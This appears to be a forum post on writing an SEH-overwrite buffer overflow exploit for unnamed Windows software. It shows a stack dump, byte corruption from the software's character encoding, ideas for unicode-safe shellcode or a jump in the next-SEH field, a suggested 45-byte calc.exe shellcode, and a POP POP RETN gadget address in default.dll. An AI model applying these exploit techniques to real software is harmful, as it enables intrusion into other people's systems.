There are some difficulties
1.Here is the stack
02F0FF60 77777777 Pointer to next SEH record
02F0FF64 66666666 SE handler
02F0FF68 90C290C2
02F0FF6C 90C290C2
02F0FF70 90C290C2
02F0FF74 90C290C2
02F0FF78 90C290C2
02F0FF7C 90C290C2
02F0FF80 90C290C2
02F0FF84 90C290C2
02F0FF88 90C290C2
02F0FF8C 90C290C2
02F0FF90 90C290C2
02F0FF94 ABC390C2
02F0FF98 ABC35903
02F0FF9C C3A8C305
02F0FFA0 C3BFC3B8
02F0FFA4 49BFC3BF
02F0FFA8 49494949
02F0FFAC 49494949
02F0FFB0 49494949
02F0FFB4 49494949
C2,C3 is a caracter I didn't copy there so ...software adds it.
How I want to solv it is make shellcode unicode ,just a guess..
Another way is to just overwrite the Next seh handler address with a jmp so eip points
directly on our shellcode with the condition that a unicode shellcode isn't affected by the
software caracters C3...
2.There is less size for the shellcode.
Use a small shellcode like a 45 byte calc.exe
http://www.packetstormsecurity.org/shel ... llcode.txtBtw universall addresses can be found for example
04B43B7A 5E POP ESI ---default.dll
04B43B7B 5F POP EDI
04B43B7C C3 RETN